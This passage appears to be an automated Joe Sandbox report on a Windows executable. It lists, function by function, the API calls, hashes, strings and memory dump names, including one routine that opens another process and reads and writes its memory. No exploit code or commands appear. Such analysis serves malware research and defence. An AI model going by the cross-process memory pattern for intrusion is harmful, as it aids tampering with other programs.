                                                                    • Instruction ID: 7551471a3832f0ce7333b9da6c7216f2207db310edd489f00ff15544a30fe064
                                                                    • Opcode Fuzzy Hash: 93cadc16216151516f3780b61926a5d8b90573ec759c075b9cbc083cffd55d75
                                                                    • Instruction Fuzzy Hash: 8A016D75201315BFEB205FA9DC48D6B7FECEF8A654B50446AF989C3210DA3A8C04CB70
                                                                    APIs
                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?,?,?,01027455), ref: 01027127
                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?,?), ref: 01027142
                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?,?), ref: 01027150
                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?), ref: 01027160
                                                                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?,?), ref: 0102716C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 3897988419-0
                                                                    • Opcode ID: 68a6dac7f5cafe24e47f9b39f343e934e4f26fcb57c7e1b228e3b44c728a90d5
                                                                    • Instruction ID: 84e9df0dcebaef203f6b88bc21edf270a50a44b62911152a2efec54fbb56d00a
                                                                    • Opcode Fuzzy Hash: 68a6dac7f5cafe24e47f9b39f343e934e4f26fcb57c7e1b228e3b44c728a90d5
                                                                    • Instruction Fuzzy Hash: 86018476601325BBDB214F68DC44BABBFEEEF44651F244054FE84D2214D73ADD408BA0
                                                                    APIs
                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 01035260
                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0103526E
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 01035276
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 01035280
                                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010352BC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                    • String ID:
                                                                    • API String ID: 2833360925-0
                                                                    • Opcode ID: 7dcccba414e16e9ac9be0cb63ab2a4e062831420a760d87b32b591aa2e0b7b41
                                                                    • Instruction ID: 2ed5e882f1aabf1f8a0bf5a05fe1d1a75ab7b9bcd1c6918f782ee872059abc09
                                                                    • Opcode Fuzzy Hash: 7dcccba414e16e9ac9be0cb63ab2a4e062831420a760d87b32b591aa2e0b7b41
                                                                    • Instruction Fuzzy Hash: 2A015731D0161ADBCF10EFE4E8489EEBB78FB4A311F400446EA81B2194CB39555087A5
                                                                    APIs
                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 010280C0
                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 010280CA
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 010280D9
                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 010280E0
                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 010280F6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 44706859-0
                                                                    • Opcode ID: c7be52eed0893dd56925626d419155394db7cfe242ba133b96e5eb66590dc76d
                                                                    • Instruction ID: 58d6f391577b316411e4292daca5efde3acb303e9d71d1f4be60e4dcf6e88151
                                                                    • Opcode Fuzzy Hash: c7be52eed0893dd56925626d419155394db7cfe242ba133b96e5eb66590dc76d
                                                                    • Instruction Fuzzy Hash: 54F0C234205315AFEB211FA8EC8CE6B3FECEF4A754B144056F985C3180CB6A9840DB60
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0102C1F7
                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0102C20E
                                                                    • MessageBeep.USER32(00000000), ref: 0102C226
                                                                    • KillTimer.USER32(?,0000040A), ref: 0102C242
                                                                    • EndDialog.USER32(?,00000001), ref: 0102C25C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                    • String ID:
                                                                    • API String ID: 3741023627-0
                                                                    • Opcode ID: 0ecb5a14d0dedbc5fe7c6f26c8a10beb915a0efa00bac4b880859ba2e3eeda1b
                                                                    • Instruction ID: c187b373c758b01c5cadd3ff0361f2100c26b97936fbc0ce42312d3ed6bd9a95
                                                                    • Opcode Fuzzy Hash: 0ecb5a14d0dedbc5fe7c6f26c8a10beb915a0efa00bac4b880859ba2e3eeda1b
                                                                    • Instruction Fuzzy Hash: 0801843040431597FB306B64DD4EF9B7BA8BB05705F000259E6C6914D19BA965488B50
                                                                    APIs
                                                                    • EndPath.GDI32(?), ref: 00FD13BF
                                                                    • StrokeAndFillPath.GDI32(?,?,0100B888,00000000,?), ref: 00FD13DB
                                                                    • SelectObject.GDI32(?,00000000), ref: 00FD13EE
                                                                    • DeleteObject.GDI32 ref: 00FD1401
                                                                    • StrokePath.GDI32(?), ref: 00FD141C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                    • String ID:
                                                                    • API String ID: 2625713937-0
                                                                    • Opcode ID: 4f3cdb44ced7cbaceb894b7cdfcec44aafee675d3ddb3dd1c4caf9e5d5c1959e
                                                                    • Instruction ID: fcfb51b793a010f432a15937d82e8ff28e108b4522185b187d29b06d037c17aa
                                                                    • Opcode Fuzzy Hash: 4f3cdb44ced7cbaceb894b7cdfcec44aafee675d3ddb3dd1c4caf9e5d5c1959e
                                                                    • Instruction Fuzzy Hash: 73F0C931005309ABDB329F66EC5C75A3BA5B702326F1C8216F4A9991F8C73F4995EF50
                                                                    APIs
                                                                      • Part of subcall function 00FF0DB6: std::exception::exception.LIBCMT ref: 00FF0DEC
                                                                      • Part of subcall function 00FF0DB6: __CxxThrowException@8.LIBCMT ref: 00FF0E01
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                      • Part of subcall function 00FD7A51: _memmove.LIBCMT ref: 00FD7AAB
                                                                    • __swprintf.LIBCMT ref: 00FE2ECD
                                                                    Strings
                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00FE2D66
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                    • API String ID: 1943609520-557222456
                                                                    • Opcode ID: 3f4e5f35f83ce2b277f44c516b03347f87023d907e23ec2a14a27925bb2d7a68
                                                                    • Instruction ID: b4863e5cfda650b442068804bec9783a272e0ba9415f46b31b6b2c1cefb4bbcc
                                                                    • Opcode Fuzzy Hash: 3f4e5f35f83ce2b277f44c516b03347f87023d907e23ec2a14a27925bb2d7a68
                                                                    • Instruction Fuzzy Hash: E9919A725083519FC714EF28CC85C6EB7A9EF85710F04091EF9829B2A1EA78ED44EB52
                                                                    APIs
                                                                      • Part of subcall function 00FD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FD4743,?,?,00FD37AE,?), ref: 00FD4770
                                                                    • CoInitialize.OLE32(00000000), ref: 0103B9BB
                                                                    • CoCreateInstance.OLE32(01062D6C,00000000,00000001,01062BDC,?), ref: 0103B9D4
                                                                    • CoUninitialize.OLE32 ref: 0103B9F1
                                                                      • Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
                                                                      • Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                    • String ID: .lnk
                                                                    • API String ID: 2126378814-24824748
                                                                    • Opcode ID: c2c649161ae811f58229d2ec934dc843cef5b98c050846f0c9428239bfe87cf5
                                                                    • Instruction ID: 21f12f476eec421795d1c7e5b90057d34d1c3c985262ac0ef329aa30b90309ce
                                                                    • Opcode Fuzzy Hash: c2c649161ae811f58229d2ec934dc843cef5b98c050846f0c9428239bfe87cf5
                                                                    • Instruction Fuzzy Hash: 71A168756043059FC714EF14C884D2ABBEAFF89718F088989F8999B362CB75EC45CB91
                                                                    APIs
                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00FF50AD
                                                                      • Part of subcall function 010000F0: __87except.LIBCMT ref: 0100012B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorHandling__87except__start
                                                                    • String ID: pow
                                                                    • API String ID: 2905807303-2276729525
                                                                    • Opcode ID: fce1586714ea808536ba15585c818c8b58b618aaab200636873d971532aa26d2
                                                                    • Instruction ID: e9903e35871a7c2f509409aa6207fb7e30fad0fd62ef9dcb732fd7fc987e8d7f
                                                                    • Opcode Fuzzy Hash: fce1586714ea808536ba15585c818c8b58b618aaab200636873d971532aa26d2
                                                                    • Instruction Fuzzy Hash: 5D513071D0890B96F7236618C9103BE3BD49F40BA0F208D99F7D5452FDDE3989C4AB86
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$_memmove
                                                                    • String ID: ERCP
                                                                    • API String ID: 2532777613-1384759551
                                                                    • Opcode ID: f3754cf8a93f4a7373c65baa1d1a47e09561b7c83ba1a76e224cccdf44336ee3
                                                                    • Instruction ID: 3524e4bcb40fbb2b52e9e0058e3fb3f20cfafa5c55fca4d38473a8de96eb5ae6
                                                                    • Opcode Fuzzy Hash: f3754cf8a93f4a7373c65baa1d1a47e09561b7c83ba1a76e224cccdf44336ee3
                                                                    • Instruction Fuzzy Hash: 3951B071900709DFDB24EF66C8817AABBE4EF54354F20856EE98AD7251E734AA40DB40
                                                                    APIs
                                                                      • Part of subcall function 010314BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,01029296,?,?,00000034,00000800,?,00000034), ref: 010314E6
                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0102983F
                                                                      • Part of subcall function 01031487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,010292C5,?,?,00000800,?,00001073,00000000,?,?), ref: 010314B1
                                                                      • Part of subcall function 010313DE: GetWindowThreadProcessId.USER32(?,?), ref: 01031409
                                                                      • Part of subcall function 010313DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0102925A,00000034,?,?,00001004,00000000,00000000), ref: 01031419
                                                                      • Part of subcall function 010313DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0102925A,00000034,?,?,00001004,00000000,00000000), ref: 0103142F
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 010298AC
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 010298F9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                    • String ID: @
                                                                    • API String ID: 4150878124-2766056989
                                                                    • Opcode ID: 0d2fa37bda3a28d4db1a01f9d1359d5d77212147586b6148232c42caaf65b9c1
                                                                    • Instruction ID: adc1410d350102cac329800d02fdfe058ea939134a6a4af6e42239e27167e5ce
                                                                    • Opcode Fuzzy Hash: 0d2fa37bda3a28d4db1a01f9d1359d5d77212147586b6148232c42caaf65b9c1
                                                                    • Instruction Fuzzy Hash: FF41617690122DBFDB10DFA8CD81ADEBBB8EF59700F004095FA85B7180DA756E45CBA0
                                                                    APIs
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0105F910,00000000,?,?,?,?), ref: 010579DF
                                                                    • GetWindowLongW.USER32 ref: 010579FC
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 01057A0C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long
                                                                    • String ID: SysTreeView32
                                                                    • API String ID: 847901565-1698111956
                                                                    • Opcode ID: 7e7966d5e3a0538ee1bc7c71febd82b6ca29dc9a3c656ee4dbbaafee8daa73ad
                                                                    • Instruction ID: 9dbfa1fb0185f1013433ca85e3cf617e160b69fba403abf96f9946c9a9f4a13d
                                                                    • Opcode Fuzzy Hash: 7e7966d5e3a0538ee1bc7c71febd82b6ca29dc9a3c656ee4dbbaafee8daa73ad
                                                                    • Instruction Fuzzy Hash: 95310131200206ABDB918E38CC05BEB7BA9FF45324F644715FDB5932D0D735E950AB60
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 01057461
                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 01057475
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 01057499
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window
                                                                    • String ID: SysMonthCal32
                                                                    • API String ID: 2326795674-1439706946
                                                                    • Opcode ID: f93e34ff16b593fdbf31acba51e99a8f02b83d610eefd7ad54ec2c0759dc4765
                                                                    • Instruction ID: 602cfa531fb149d37b2a81200ef306b00292af770c83bd869d6667485413d5b9
                                                                    • Opcode Fuzzy Hash: f93e34ff16b593fdbf31acba51e99a8f02b83d610eefd7ad54ec2c0759dc4765
                                                                    • Instruction Fuzzy Hash: E621B132500219ABDF228E64CC45FEB3FAAFB48724F110154FE956B190DB75A851DBA0
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 01057C4A
                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 01057C58
                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01057C5F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$DestroyWindow
                                                                    • String ID: msctls_updown32
                                                                    • API String ID: 4014797782-2298589950
                                                                    • Opcode ID: 4a6f5d9cfb8a0c0c0507243c12513ef6fcac6780f97d44bb57951b79bb189c27
                                                                    • Instruction ID: adeda2ac695ea028d8a942df262576c2bb0e6fddd6016c7a19d32674af04b59f
                                                                    • Opcode Fuzzy Hash: 4a6f5d9cfb8a0c0c0507243c12513ef6fcac6780f97d44bb57951b79bb189c27
                                                                    • Instruction Fuzzy Hash: A12171B5600209AFEB51DF28DCD1DA73BEDEF4A354B540059FA519B351CA36EC019B60
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01056D3B
                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01056D4B
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01056D70
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$MoveWindow
                                                                    • String ID: Listbox
                                                                    • API String ID: 3315199576-2633736733
                                                                    • Opcode ID: f04a5a7c987ced840dd6d17d7472b1494632de1df3ff85640afc311049406ca1
                                                                    • Instruction ID: 5d7d28e005c445745e9587fc172e475174e1d4ed042dab0837700dd598cd007a
                                                                    • Opcode Fuzzy Hash: f04a5a7c987ced840dd6d17d7472b1494632de1df3ff85640afc311049406ca1
                                                                    • Instruction Fuzzy Hash: 5421C532600118BFDF629F58CC44FBB3BBAFF89750F418164F9859B191C6769C5187A0
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 01057772
                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 01057787
                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01057794
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: msctls_trackbar32
                                                                    • API String ID: 3850602802-1010561917
                                                                    • Opcode ID: 14be9dc689ce0f30246bef28701f7cde05ff096aa1da1a4702e12b257c23d5d0
                                                                    • Instruction ID: 98d1e383885faa6be54d8c8981198e0d9ec88b7d8ded53d6cced037c30d5466b
                                                                    • Opcode Fuzzy Hash: 14be9dc689ce0f30246bef28701f7cde05ff096aa1da1a4702e12b257c23d5d0
                                                                    • Instruction Fuzzy Hash: D811E372240209BAEF655E65DC05FEB7BA9FF88B54F014119FA81A6090D672E411DB20
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00FD4B83,?), ref: 00FD4C44
                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FD4C56
                                                                    Strings
                                                                    Memory Dump Source
